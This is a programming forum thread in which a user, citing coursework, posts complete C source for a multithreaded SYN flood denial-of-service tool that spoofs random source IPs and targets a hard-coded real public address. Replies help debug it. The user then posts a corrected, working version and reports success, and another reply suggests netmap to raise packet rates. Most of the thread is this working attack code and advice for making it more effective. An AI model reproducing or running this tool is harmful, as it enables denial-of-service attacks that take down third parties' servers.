Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
A
A
Alexander Tikhonov2014-10-04 00:01:16
linux
Alexander Tikhonov, 2014-10-04 00:01:16

SYN Flood DOS Attack. How to figure out what's what and why it doesn't work?

I'm trying to organize SYN Flood on the server for purely scientific purposes (I have such a coursework) I
took the source as a basis: www.binarytides.com/syn-flood-dos-attack
Added multithreading and IP substitution.

spoiler
/*
    /*
    Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<string.h> //memset
#include<sys/socket.h>
#include<errno.h> //For errno - the error number
#include<netinet/tcp.h>   //Provides declarations for tcp header
#include<netinet/ip.h>    //Provides declarations for ip header
#include<pthread.h>
#include<stdlib.h> //for exit(0);
#include<time.h>
#define MAXPTHREAD 5
#define PREY_PORT 80
void func(void * arg);
char * getRandStr();
struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;

    struct tcphdr tcp;
};

unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}

int main (void)
{
    srand(time(NULL));
    pthread_t thread;
    int i,pthreadResult;
    for(i=0;i<MAXPTHREAD; ++i)
    {
        pthreadResult=pthread_create(&thread,NULL,&func,getRandStr());
        if(pthreadResult!=0)
            err_sys("Error pthread: %d",i);
    }
    while(1)
        sleep(10);
    return 0;
}
void func(void * arg)
{
    //Create a raw socket
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    //Datagram to represent the packet
    char datagram[4096] , source_ip[32];
    //IP header
    struct iphdr *iph = (struct iphdr *) datagram;
    //TCP header
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;

    strcpy(source_ip , (char *)arg);

    sin.sin_family = AF_INET;
    sin.sin_port = htons(PREY_PORT);
    sin.sin_addr.s_addr = inet_addr ("85.113.47.5");

    memset (datagram, 0, 4096); /* zero out the buffer */

    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = htons(54321);  //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;      /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                should fill in the correct checksum during transmission */
    tcph->urg_ptr = 0;
    //Now the IP checksum

    psh.source_address = inet_addr( source_ip );
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);

    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

    //IP_HDRINCL to tell the kernel that headers are included in the packet
    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
    {
        printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
        exit(0);
    }

    //Uncommend the loop if you want to flood :)
    while (1)
    {
        //Send the packet
        if (
                sendto (s,      /* our socket */
                    datagram,   /* the buffer containing headers and data */
                    iph->tot_len,    /* total length of our datagram */
                    0,      /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin,   /* socket addr, just like in */
                    sizeof (sin)) < 0)       /* a normal send() */
        {
            printf ("error\n");
        }
        //Data send successfully
//        else
//        {
//            printf ("Packet Send \n");
//        }
    }
    return;
}
char * getRandStr()
{
    char  str[32];
    str[0]='\0';
    strcat(str,"192.168.");
    char buffer[16];
    int nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    strcat(str,".");
    nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    //printf("str return: %s\n",str);
    return str;
}
spoiler
e52363921b7c.png

The fact is that when I run the program, the load on the CPU sharply increases (after all, there are 5 threads in total) and the network stops responding. It is impossible to check what is happening on the attacked server, and something tells me that everything is fine with him. What am I doing wrong? How to achieve the desired SYN Flood Attack?
Before that, I acted on the server with a simple "GET /" request in 500+ threads and everything worked, there was also a noticeable delay in the response on the server.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

3 answer(s)
Report
J
jcmvbkbc, 2014-10-04
@tikhonov666

Some kind of mess in the source code:
what is struct ip?
htons?
not iph->tot_len >> 1 but sizeof(*iph)
In general, you will limit yourself to sending one packet and look at it in some tcpdump or wireshark.

Report
A
Alexander Tikhonov, 2014-10-04
@tikhonov666

jcmvbkbc
struct ip

spoiler
/*
* Structure of an internet header, naked of options.
*/
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ip_hl:4; /* header length */
unsigned int ip_v:4; /* version */
#endif
#if __BYTE_ORDER == __BIG_ENDIAN
unsigned int ip_v:4; /* version */
unsigned int ip_hl:4; /* header length */
#endif
u_int8_t ip_tos; /* type of service */
u_short ip_len; /* total length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
u_int8_t ip_ttl; /* time to live */
u_int8_t ip_p; /* protocol */
u_short ip_sum; /* checksum */
struct in_addr ip_src, ip_dst; /* source and dest address */
};

htons is a function that converts a port number to a binary representation.
getRandStr() - yes, thanks. Corrected the mistake.
The resulting program:
spoiler
/*
    Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<string.h> //memset
#include<sys/socket.h>
#include<errno.h> //For errno - the error number
#include<netinet/tcp.h>   //Provides declarations for tcp header
#include<netinet/ip.h>    //Provides declarations for ip header
#include<pthread.h>
#include<stdlib.h> //for exit(0);
#include<time.h>
#define MAXPTHREAD 8
#define PREY_PORT 80
void * func(void * arg);
char * getRandStr();
struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;

    struct tcphdr tcp;
};

unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}

int main (void)
{
    srand(time(NULL));
    pthread_t thread;
    int i,pthreadResult;
    for(i=0;i<MAXPTHREAD; ++i)
    {
        pthreadResult=pthread_create(&thread,NULL,&func,getRandStr());
        if(pthreadResult!=0)
            err_sys("Error pthread: %d",i);
    }
    while(1)
        sleep(10);
    return 0;
}
void * func(void * arg)
{
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    char datagram[4096] , source_ip[32];
    struct iphdr *iph = (struct iphdr *) datagram;
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
    arg=(char *)arg;
    strcpy(source_ip , arg);

    sin.sin_family = AF_INET;
    sin.sin_port = htons(PREY_PORT);
    sin.sin_addr.s_addr = inet_addr ("85.113.47.5");

    memset (datagram, 0, 4096); /* zero out the buffer */

    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 92; /// !!!!
    iph->tot_len = 576; /// sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = 1888; ///  //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) datagram, sizeof(*iph));/// iph->tot_len >> 1);

    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;      /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                should fill in the correct checksum during transmission */
    tcph->urg_ptr = 0;

    psh.source_address = inet_addr( source_ip );
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);

    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
    {
        printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
        exit(0);
    }
    char * temp;
    while (1)
    {
        temp=getRandStr();
        iph->saddr = inet_addr ( temp );    //Spoof the source ip address
        sendto (s,      /* our socket */
                    datagram,   /* the buffer containing headers and data */
                    iph->tot_len,    /* total length of our datagram */
                    0,      /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin,   /* socket addr, just like in */
                    sizeof (sin));// < 0)       /* a normal send() */
        free(temp);
    }

    return;
}
char * getRandStr()
{
    char * str=(char *)malloc(32+1);
    if(str==NULL)
    {
        printf("Not enough memory for \"malloc\"\n");
        exit(1);
    }
    str[0]='\0';
    strcat(str,"85.114.");
    char buffer[16];
    int nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    strcat(str,".");
    nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    return str;
}

Installed wireshark and tested it. SYN packets come in large numbers and from different IPs. And everything seems to be fine.
When directly I send to the server, there is no result. I'm running on 7 threads. The processes are loaded at ~ 100%, so even through the browser and through the ping it is not possible to contact the server. After closing the program, I quickly go to the site, and at least he has something.
I did not quite understand you. Where to go and what checkers? Is this some kind of humor?) Maybe I'm not catching up, because. I started this thread 2 weeks ago.
Ideas do not come to mind yet, I'll go to deal with hping.
[UPDATE]
Received great :)

Report
A
AntiDDoSexpert, 2014-11-17
@AntiDDoSexpert

on an unmodified kernel, you are unlikely to get a bitrate of more than 150-200 pps, if you need more then use the netmap framework, it really works fine only under freebsd, but still it can send packets at interface speed without loading a percent.

Similar questions
M
Maxim Terentiev2015-09-20 09:51:26
How to change the default set of programs in Xubuntu? 1Reply
B
Ben_r0072021-06-05 18:05:19
How to check the status of SAS disks on a physical server? 2Reply
3
3ds2010-11-24 14:56:30
Hide windows from boot menu? 10Reply
M
Millerish2018-01-27 16:25:37
How to install time doctor in debian? 2Reply
K
kzoper2018-01-28 11:27:40
Antergos pppoe connection how to set up? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question